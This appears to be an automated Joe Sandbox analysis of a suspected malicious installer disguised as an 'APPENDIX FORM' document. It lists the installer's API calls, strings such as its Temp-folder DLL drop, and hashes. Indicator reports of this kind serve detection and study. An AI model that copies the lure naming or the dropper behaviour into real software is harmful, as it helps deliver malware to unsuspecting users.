                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                                                                              • Instruction ID: 3f5ce1fcf3cb01a0fa9ccaf83f12fe0bb2d46f1b1d5dc84fd7777e7c50a39ee5
                                                                                                              • Opcode Fuzzy Hash: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                                                                              • Instruction Fuzzy Hash: D5F01270900109BBDF205F60CD0ABAE3779AB00345F00803AFA16B52D1D7F86A558B99
                                                                                                              Function 1000182A Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,?), ref: 10001258
                                                                                                                • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                                              • GlobalFree.KERNEL32(?), ref: 1000188C
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001A18
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001A1D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeGlobal$lstrcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 176019282-0
                                                                                                              • Opcode ID: 005973ac7ef1aad3e32af9e663bee20bd7d28a1ea40780e3a2324aca203f840c
                                                                                                              • Instruction ID: 002a9f38c559984e9ec1427774ff2aecdab259683a6adff3edf0c49f5852233b
                                                                                                              • Opcode Fuzzy Hash: 005973ac7ef1aad3e32af9e663bee20bd7d28a1ea40780e3a2324aca203f840c
                                                                                                              • Instruction Fuzzy Hash: C951D332D04159AAFB21DFE4C8A16EEBBF5EB443D0F22416AE805E311DC635AF01DB91
                                                                                                              Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: a50a2e423917ebad030f3f3cc2f13d0133a1d1d73f77d1ead765e1172e6ee23a
                                                                                                              • Instruction ID: 71b2249b13ff86d947a8851956aed69ca37d5691e0091abe6cfe68cca6ac1506
                                                                                                              • Opcode Fuzzy Hash: a50a2e423917ebad030f3f3cc2f13d0133a1d1d73f77d1ead765e1172e6ee23a
                                                                                                              • Instruction Fuzzy Hash: 3EF04FB2A04104BFE701EBA4DE88CAF77BCEB44301B004576F501F2091C7389D028B79
                                                                                                              Function 004047B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(0041FCE0,0041FCE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046D4,000000DF,0000040F,00000400,00000000), ref: 00404842
                                                                                                              • wsprintfA.USER32 ref: 0040484A
                                                                                                              • SetDlgItemTextA.USER32(?,0041FCE0), ref: 0040485D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s
                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                              • Opcode ID: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                                                                              • Instruction ID: 6f1176408ced8b99102d6b0dd6b5492669b9c19e2170e44431a7d9c2d4d564a9
                                                                                                              • Opcode Fuzzy Hash: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                                                                              • Instruction Fuzzy Hash: B011E2776001243BDB00626D9C4AFEF3699DBC6374F15823BFA25B71D1EA788C5182E9
                                                                                                              Function 00403A2E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetWindowTextA.USER32(00000000,Centraleuropisk Setup), ref: 00403AC6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: TextWindow
                                                                                                              • String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$1033$Centraleuropisk Setup
                                                                                                              • API String ID: 530164218-1997691186
                                                                                                              • Opcode ID: ecf2586eb918082e7f91a8e91a20f655c840d627f695942e1f179704e18d15de
                                                                                                              • Instruction ID: 10e0c2ccfe73ace898d3091d151f83e2202ed7aa7078c17e97883b198476c6ec
                                                                                                              • Opcode Fuzzy Hash: ecf2586eb918082e7f91a8e91a20f655c840d627f695942e1f179704e18d15de
                                                                                                              • Instruction Fuzzy Hash: 0211D1B1B04211ABCB309F55DC80A337BADEB84716328813FE841A7390D63D9D029EA8
                                                                                                              Function 00405770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403203,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405776
                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403203,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 0040577F
                                                                                                              • lstrcatA.KERNEL32(?,00409014), ref: 00405790
                                                                                                              Strings
                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405770
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                              • API String ID: 2659869361-2382934351
                                                                                                              • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                              • Instruction ID: 3984972151376f20e9c478668be1f91fb97e3b7997f4a575d9561119d44aee84
                                                                                                              • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                              • Instruction Fuzzy Hash: 60D0A9A2609A307AE20222198C09E8F2A08CF02300B080022F600B62A2C63C0E819BFE
                                                                                                              Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                              • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                                • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404258612-0
                                                                                                              • Opcode ID: 19ad64cbfd362b12fd4dbc717af0eb9568492415a51530331d6a798985c52559
                                                                                                              • Instruction ID: 9c6242ade9da0ce9323d8482387ced81676d99406c202c21daae8146895b88d7
                                                                                                              • Opcode Fuzzy Hash: 19ad64cbfd362b12fd4dbc717af0eb9568492415a51530331d6a798985c52559
                                                                                                              • Instruction Fuzzy Hash: 1B115EB1900218BEDB11AFA5D941DEEBBB9EF04344B10807AF505F61A1E7389A55DB28
                                                                                                              Function 00405809 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharNextA.USER32(?,?,luggages.con,?,00405875,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405817
                                                                                                              • CharNextA.USER32(00000000), ref: 0040581C
                                                                                                              • CharNextA.USER32(00000000), ref: 00405830
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext
                                                                                                              • String ID: luggages.con
                                                                                                              • API String ID: 3213498283-617196232
                                                                                                              • Opcode ID: 180c61c53d858fd4c5624aa8e60612970d78334aec32c9cd585625149e8e1fa8
                                                                                                              • Instruction ID: c370150418e9ab88dc314615aa240fb04adc0c261fd8568b7c83654f53a8e585
                                                                                                              • Opcode Fuzzy Hash: 180c61c53d858fd4c5624aa8e60612970d78334aec32c9cd585625149e8e1fa8
                                                                                                              • Instruction Fuzzy Hash: 62F09653909FA16AFF3276281C54B775B88CB55351F14807FEE80762D2C27C98618F9A
                                                                                                              Function 00404F3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 00404F6E
                                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00404FBF
                                                                                                                • Part of subcall function 0040401A: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040402C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                                                                              • Instruction ID: cde12f86dd31b896884096c044580e22e17e4468508aba299e1a08f9367d6141
                                                                                                              • Opcode Fuzzy Hash: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                                                                              • Instruction Fuzzy Hash: B90171B110420EAFDF209F11DD80A9B3666E7C4754F144037FB00762D1D73A9C62ABA9
                                                                                                              Function 004024D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 004024F1
                                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402510
                                                                                                              Strings
                                                                                                              • C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp\System.dll, xrefs: 004024DF, 00402504
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWritelstrlen
                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp\System.dll
                                                                                                              • API String ID: 427699356-3705870653
                                                                                                              • Opcode ID: f4beac6f25d94cce8f83a24745213278be70b79441c519fa994f2423dab96886
                                                                                                              • Instruction ID: b8daa87b0571fe9e3593993d89a4d1fc22b88d503ff9c604a545e2a39a2a9337
                                                                                                              • Opcode Fuzzy Hash: f4beac6f25d94cce8f83a24745213278be70b79441c519fa994f2423dab96886
                                                                                                              • Instruction Fuzzy Hash: 28F080B2A14244BFEB50EBA45E49AAB3758D740344F10443BB141F51C1D6BC4941DB6D
                                                                                                              Function 004036D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,004036AB,771B3410,004034D8,?), ref: 004036EE
                                                                                                              • GlobalFree.KERNEL32(0052A998), ref: 004036F5
                                                                                                              Strings
                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004036E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                              • API String ID: 1100898210-2382934351
                                                                                                              • Opcode ID: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                                                                              • Instruction ID: f66ed857716bd8696a1c06da484ecea8d2aaa831b493d384aaa0c627c98861e6
                                                                                                              • Opcode Fuzzy Hash: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                                                                              • Instruction Fuzzy Hash: 64E0C233801030ABC7215FA5ED0476ABB687F88B22F06442AEC007F3A0C7752C814BCD
                                                                                                              Function 004057B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 004057BD
                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 004057CB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrlen
                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                              • API String ID: 2709904686-3976562730
                                                                                                              • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                                                              • Instruction ID: 0204d9c44b7810c5f580a7733e28166c0dc93526616a141743e7fa1f2396f515
                                                                                                              • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
